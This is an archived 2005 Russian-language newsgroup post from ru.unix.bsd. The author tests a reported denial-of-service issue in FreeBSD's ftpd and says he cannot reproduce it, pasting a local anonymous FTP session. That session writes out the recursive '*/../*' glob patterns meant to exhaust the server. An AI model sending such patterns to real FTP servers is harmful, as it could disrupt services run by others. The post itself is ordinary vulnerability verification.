|
ru.unix.bsd
- RU.UNIX.BSD ------------------------------------------------------------------
From : Sergey Korolew 2:6053/1.2 26 May 2005 13:37:34
To : orm@ridexgroup.ru
Subject : DoS против ftpd
--------------------------------------------------------------------------------
26 Май 05 12:27, Alex Ivanov писал к All:
AI> Кто что думает про такое сообщение?
AI> http://www.security.nnov.ru/news1056.html?l=RU
AI> Я конечно понимаю - стандартный ftpd используют редко, но все же, софт
AI> входящий в поставку...
Hе подтверждаю. Анонимный ftp в chroot.
$ ftp -a localhost
Connected to localhost
220 FTP server ready.
331 Guest login ok, send your email address as password.
230 Guest login ok, access restrictions apply.
Remote system type is UNKNOWN.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
229 Entering Extended Passive Mode (|||50680|)
150 Opening ASCII mode data connection for '/bin/ls'.
ftpd: */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*: No such
file or directory
226 Transfer complete.
ftp> ls
ftp> */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/..
ftp> /*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
229 Entering Extended Passive Mode (|||61834|)
150 Opening ASCII mode data connection for '/bin/ls'.
ftpd:
*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/..
/*/../*/../*/../*/../*/../*/../*/../*/../*: No such file or directory
226 Transfer complete.
ftp>
$ uname -v
FreeBSD 5.4-STABLE #16: Sun May 15 18:35:24 MSD 2005
Всего наилучшего,
Sergey aka DS
--- GoldED+/W32 snapshot-2001.03.04
* Origin: Hету. Придумывать лень. (2:6053/1.2)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
|
